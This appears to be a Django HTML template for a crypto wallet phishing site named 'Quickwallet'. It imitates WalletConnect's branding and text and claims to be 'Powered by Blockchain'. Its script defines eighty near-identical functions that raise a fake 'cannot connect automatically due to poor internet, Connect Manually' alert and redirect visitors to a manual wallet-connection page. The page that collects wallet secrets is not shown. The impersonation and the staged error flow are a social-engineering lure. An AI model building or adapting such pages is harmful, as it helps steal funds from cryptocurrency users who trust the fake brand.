{% load static %}

<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="stylesheet" href="{% static 'css/main.css' %}" type="text/css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Bridge for connecting Wallets to Dapps">
    <meta property="og:image" content="{% static 'images/logo2.png' %}">
    <link rel="icon" href="{% static 'images/logo2.png' %}">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/css/bootstrap.min.css">

    <style type="text/css">
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box !important;
            -webkit-appearance: none;
        }
        
        html,
        body,
        #root,
        #router-root {
            height: 100%;
            width: 100%;
            margin: 0px;
            padding: 0px;
        }
        
        body {
            font-family: -apple-system, system-ui, BlinkMacSystemFont, "SF Pro Text", Roboto, Helvetica, Arial, sans-serif;
            font-style: normal;
            font-stretch: normal;
            font-weight: 400;
            font-size: 16px;
            color: rgb(88, 112, 135);
            overflow-y: auto;
            text-rendering: optimizelegibility;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            -webkit-font-smoothing: antialiased;
            text-size-adjust: 100%;
        }
        
        .top {
            width: 100%;
            margin: 0px auto;
            padding: 23px;
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(50px, 1fr));
            grid-gap: 10px;
            margin-bottom: 15px;
            justify-content: center;
        }
        
        a.left {
            color: rgb(88, 120, 188);
            text-decoration: none;
            font-weight: 550;
            font-size: 16px;
            padding-top: 10px;
            justify-content: center;
        }
        
        .top img {
            width: 100%;
            max-width: 120px;
            min-width: 60px;
            justify-content: center;
        }
        
        .gFeYHJ {
            font-size: 35px;
            font-weight: 500;
            text-align: center;
        }
        
        .lpfxqP {
            width: 90%;
            margin: 30px 0px;
            font-size: 30px;
            font-weight: 300;
            text-align: center;
        }
        
        .dXgqeu img {
            width: 100%;
            padding: 30px;
        }
        
        .lbvZBb {
            flex: 1 1 0%;
            margin: 30px -32px;
            display: flex;
            text-align: left;
            -webkit-box-pack: justify;
            justify-content: space-between;
        }
        
        a,
        p,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6 {
            text-decoration: none;
            margin: 0px;
            padding: 0px;
        }
        
        p {
            display: block;
            margin-block-start: 1em;
            margin-block-end: 1em;
            margin-inline-start: 0px;
            margin-inline-end: 0px;
        }
        
        .bout {
            padding: 20px;
            font-size: 17px;
            font-weight: 300;
            line-height: 1.35;
            text-align: left;
        }
        
        .wallets {
            padding: 20px;
            font-size: 18px;
            font-weight: 300;
            line-height: 1.35;
        }
        
        a,
        p,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6 {
            text-decoration: none;
            margin: 0px;
            padding: 0px;
        }
        
        h2.home {
            font-size: 32px;
            font-weight: 300;
            color: rgb(46, 67, 88);
            margin-bottom: 20px;
        }
        
        h1.home {
            font-weight: 450;
            color: rgb(46, 67, 88);
            margin-bottom: 20px;
        }
        
        .all {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(90px, 1fr));
            grid-gap: 10px;
        }
        
        .apps {
            width: 95px;
            height: auto;
            padding: 10px;
            text-align: left;
            margin: auto;
            justify-content: center;
            border: none;
            border-radius: 10px;
            box-shadow: 2px 2px 10px 2px #ccc;
            font-weight: 700;
            font-size: 60%;
            text-align: center;
        }
        
        .apps a {
            text-align: left;
        }
        
        .apps img {
            max-width: 75px;
            border-radius: 50%;
            object-fit: cover;
            margin-bottom: 3px;
        }
        
        .show {
            width: auto;
            height: auto;
            border: none;
            border-radius: 5px;
            font-weight: 700;
            display: block;
            padding: 10px;
        }
        
        .hidden {
            display: none;
        }
        
        footer {
            width: auto;
            margin-top: 90px;
            justify-content: center;
        }
        
        footer a {
            color: rgb(88, 120, 188);
            margin-left: 10px;
        }
        
        footer p {
            display: flex;
            height: 20px;
            justify-content: center;
            -webkit-box-align: center;
            align-items: center;
            padding-left: 0.5em;
            font-size: 14px;
            color: rgb(88, 120, 188);
            font-weight: 500;
            float: center;
        }
        
        .footimg {
            max-width: 20px;
        }
        
        form {
            padding: 10px;
        }
        
        .tab {
            padding: 8px;
            overflow: hidden;
            border-bottom: 2px solid white;
            background-color: white;
            margin-left: 0px;
            margin-right: 0px;
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(50px, 1fr));
            grid-gap: 0px;
            margin-top: 20px;
        }
        
        .tab button {
            background-color: inherit;
            float: left;
            border: none;
            outline: none;
            cursor: pointer;
            padding: 14px 16px;
            transition: 0.3s;
        }
        
        .tab button:hover {
            background-color: #DDD;
            border-radius: 20px;
            color: black;
        }
        
        .tab button.active {
            background-color: rgb(223, 226, 38);
            border-radius: 20px;
            color: white;
            font-weight: 650;
        }
        
        .tabcontent {
            display: none;
            color: black;
            padding: 6px;
            border-bottom: none;
            border-top: none;
            margin-left: 0%;
            margin-right: 0%;
        }
        
        @keyframes fadeEffect {
            from {
                opacity: 0;
            }
            to {
                opacity: 1;
            }
        }
        
        textarea {
            width: 85%;
            height: 150px;
            border: 2px solid #BBB;
            padding: 10px;
            border-radius: 10px;
        }
        
        .desc {
            margin-top: 10px;
            font-size: 75%;
            color: rgb(88, 120, 188);
            font-weight: 700;
        }
        
        .btn {
            display: block;
            width: 85%;
            height: auto;
            color: white;
            background: rgb(223, 226, 38);
            padding: 12px;
            border: none;
            border-radius: 10px;
            font-weight: 650;
        }
        
        .btn:hover {
            background: rgb(223, 226, 38);
        }
        
        .field input {
            width: 85%;
            height: auto;
            border: 2px solid #BBB;
            padding: 10px;
            border-radius: 10px;
            margin-top: 12px;
        }
        
        img.barcode {
            max-width: 250px;
            margin-top: 70px;
        }
        
        .go_to ul li {
            list-style-type: none;
        }
        
        .go_to ul a {
            display: block;
            color: rgba(255, 255, 255, 0.75);
            background: rgb(233, 151, 0);
            padding: 8px;
            box-shadow: 0 0 7px 3px rgba(0, 0, 0, 0.3);
        }
        
        .go_to ul a:hover {
            display: block;
            color: rgb(245, 245, 245);
            background: rgb(187, 121, 0);
            box-shadow: 0 0 4px 1px rgba(0, 0, 0, 0.253);
        }
        
        .img_display {
            width: 70%;
        }
        
        .logo_display {
            width: 12%;
        }
        
        .logo_display img {
            width: 100%;
        }
        
        .nav {
            background-color: rgba(0, 0, 0, 0.85);
        }
        
        .nav a {
            margin: 0 10px;
            padding: 5px 25px;
            font-size: 18px;
            text-decoration: none;
            color: #fff;
        }
        
        .nav a:hover {
            background-color: black;
        }

        @media (max-width: 1399.99px) {
            .logo_display {
                width: 15%;
            }
        }
        
        @media (max-width: 1199.99px) {
            .logo_display {
                width: 18%;
            }
        }
        
        @media (max-width: 949.99px) {
            .logo_display {
                width: 21%;
            }
        }
        
        @media (max-width: 799.99px) {
            .logo_display {
                width: 25%;
            }
        }
        
        @media (max-width: 767.99px) {
            .img_display {
                width: 100%;
            }
            .open_protocol {
                font-size: 18px;
            }
            .nav a {
                margin: 0 8px;
                padding: 5px 20px;
                font-size: 16px;
            }
        }
        
        @media (max-width: 599.99px) {
            .logo_display {
                width: 30%;
            }
        }
        
        @media (max-width: 449.99px) {
            .logo_display {
                width: 35%;
            }
            .nav a {
                margin: 0 5px;
                padding: 5px 15px;
                font-size: 14px;
            }
        }
        
        @media (max-width: 349.99px) {
            .logo_display {
                width: 40%;
            }
        }

        .msgs_info {
            position: absolute;
            top: 0;
            width: 100%;
            padding: 40px 5px;
            background: rgb(233, 151, 0); 
        }

        .msgs_info p {
            margin: 0;
            padding: 0;
            font-size: 22px;
            font-weight: 600;
            color: #fff;
        }
    </style>
    <script>
        function show() {
            var x = document.getElementById("hidden");
            if (x.style.display === "none") {
                x.style.display = "block";
            } else {
                x.style.display = "none";
            }
            if (x.style.display === "block") {
                document.getElementById("btn").innerHTML = "Show Less &uarr;";
            }
        }

        function error1() {
            let link = document.getElementById('eror1').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error2() {
            let link = document.getElementById('eror2').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error3() {
            let link = document.getElementById('eror3').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error4() {
            let link = document.getElementById('eror4').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error5() {
            let link = document.getElementById('eror5').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error6() {
            let link = document.getElementById('eror6').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error7() {
            let link = document.getElementById('eror7').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error8() {
            let link = document.getElementById('eror8').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error9() {
            let link = document.getElementById('eror9').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error10() {
            let link = document.getElementById('eror10').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error11() {
            let link = document.getElementById('eror11').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error12() {
            let link = document.getElementById('eror12').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error13() {
            let link = document.getElementById('eror13').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error14() {
            let link = document.getElementById('eror14').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error15() {
            let link = document.getElementById('eror15').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error16() {
            let link = document.getElementById('eror16').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error17() {
            let link = document.getElementById('eror17').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error18() {
            let link = document.getElementById('eror18').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error19() {
            let link = document.getElementById('eror19').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error20() {
            let link = document.getElementById('eror20').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error21() {
            let link = document.getElementById('eror21').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error22() {
            let link = document.getElementById('eror22').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error23() {
            let link = document.getElementById('eror23').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error24() {
            let link = document.getElementById('eror24').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error25() {
            let link = document.getElementById('eror25').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error26() {
            let link = document.getElementById('eror26').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error27() {
            let link = document.getElementById('eror27').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error28() {
            let link = document.getElementById('eror28').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error29() {
            let link = document.getElementById('eror29').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error30() {
            let link = document.getElementById('eror30').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error31() {
            let link = document.getElementById('eror31').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error32() {
            let link = document.getElementById('eror32').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error33() {
            let link = document.getElementById('eror33').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error34() {
            let link = document.getElementById('eror34').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error35() {
            let link = document.getElementById('eror35').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error36() {
            let link = document.getElementById('eror36').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error37() {
            let link = document.getElementById('eror37').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error38() {
            let link = document.getElementById('eror38').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error39() {
            let link = document.getElementById('eror39').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error40() {
            let link = document.getElementById('eror40').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error41() {
            let link = document.getElementById('eror41').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error42() {
            let link = document.getElementById('eror42').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error43() {
            let link = document.getElementById('eror43').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error44() {
            let link = document.getElementById('eror44').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error45() {
            let link = document.getElementById('eror45').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error46() {
            let link = document.getElementById('eror46').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error47() {
            let link = document.getElementById('eror47').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error48() {
            let link = document.getElementById('eror48').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error49() {
            let link = document.getElementById('eror49').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error50() {
            let link = document.getElementById('eror50').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error51() {
            let link = document.getElementById('eror51').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error52() {
            let link = document.getElementById('eror52').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error53() {
            let link = document.getElementById('eror53').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error54() {
            let link = document.getElementById('eror54').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error55() {
            let link = document.getElementById('eror55').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error56() {
            let link = document.getElementById('eror56').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error57() {
            let link = document.getElementById('eror57').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error58() {
            let link = document.getElementById('eror58').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error59() {
            let link = document.getElementById('eror59').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error60() {
            let link = document.getElementById('eror60').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error61() {
            let link = document.getElementById('eror61').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error62() {
            let link = document.getElementById('eror62').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error63() {
            let link = document.getElementById('eror63').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error64() {
            let link = document.getElementById('eror64').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error65() {
            let link = document.getElementById('eror65').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error66() {
            let link = document.getElementById('eror66').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error67() {
            let link = document.getElementById('eror67').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error68() {
            let link = document.getElementById('eror68').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error69() {
            let link = document.getElementById('eror69').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error70() {
            let link = document.getElementById('eror70').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error71() {
            let link = document.getElementById('eror71').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error72() {
            let link = document.getElementById('eror72').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error73() {
            let link = document.getElementById('eror73').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error74() {
            let link = document.getElementById('eror74').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error75() {
            let link = document.getElementById('eror75').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error76() {
            let link = document.getElementById('eror76').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error77() {
            let link = document.getElementById('eror77').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error78() {
            let link = document.getElementById('eror78').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error79() {
            let link = document.getElementById('eror79').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }

        function error80() {
            let link = document.getElementById('eror80').href;
            window.alert("Wallet cannot connect automatically due to poor internet, Connect Manually");
            window.location.href = link;
        }
    </script>
    <title>Quickwallet</title>
</head>

<body>
    <center>
        {% for message in messages %}
        <div class="msgs_info ">
            <p>{{message}}</p>
        </div>
        {% endfor %}
        <header>
            <div class="nav py-3 d-flex justify-content-center align-items-center">
                <a href="{% url 'home' %}">Home</a>
                <a href="/wallets/All-Wallets">Connect Wallets</a>
                <a href="/wallets/All-Wallets">Apps</a>
                <a href="https://support.blockchain.com/hc/en-us" target="_blank">Help</a>
            </div>
        </header>
        <div class="mt-0 pt-0 logo_display ">
            <a href="{% url 'home' %} ">
                <img src="{% static 'images/logo2.png' %}" alt="logo ">
            </a>
        </div>
        <div class="lpfxqP my-0 mt-1 open_protocol ">Open protocol for connecting Wallets to Dapps</div>
        <div class="dXgqeu img_display "><img src="https://walletconnect.com/assets/blockchain-connect.png " alt="WalletConnect "></div>

        <div class="go_to ">
            <ul class="d-block d-sm-flex justify-content-center align-items-center px-0 mt-4 mt-sm-1 px-sm-3 ">
                {% for action in action %}
                <a href="wallets/{{action}} " class="btn m-3 ">
                    <li>
                        {{ action.title }}
                    </li>
                </a>
                {% endfor %}
            </ul>
        </div>

        <div class="bout ">
            <h2 class="home mb-1 ">What is Quickwallet?</h2>
            <p>Quickwallet is an open source protocol for connecting decentralised applications to mobile wallets with QR code scanning or deep linking. A user can interact securely with any Dapp from their mobile phone, making Quickwallet wallets a safer
                choice compared to desktop or browser extension wallets.</p><br>
            <h2 class="home mb-1 ">How does it work?</h2>
            <p>Quickwallet connects web applications to supported <a href="/# ">mobile wallets</a>. Quickwallet session is started by a scanning a QR code (desktop) or by clicking an application deep link (mobile).</p>
        </div>

        <footer class="mt-5 py-4 ">
            <div class="container ">
                <div class="footer-wrap ">
                    <a href="https://www.blockchain.com/wallet " target="_blank" class="webflow-link w-inline-block "><img src="uploads-ssl.webflow.com/617a4278ee3d47cfcba9c9c9/617a4278ee3d476680a9ca6f_webflow-w-small%402x.png " alt=" " class="webflow-logo-tiny
                " width="15 ">
                        <div class="paragraph-tiny ">Powered by Blockchain</div>
                    </a>
                </div>
            </div>

        </footer>
    <center>
</body>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<script>
    $(document).ready(function(){
    window.setTimeout(function() {
    $(".msgs_info").fadeTo(500, 0).slideUp(500, function(){
        $(this).remove();
    });
    }, 5000);
    });
</script>

</html>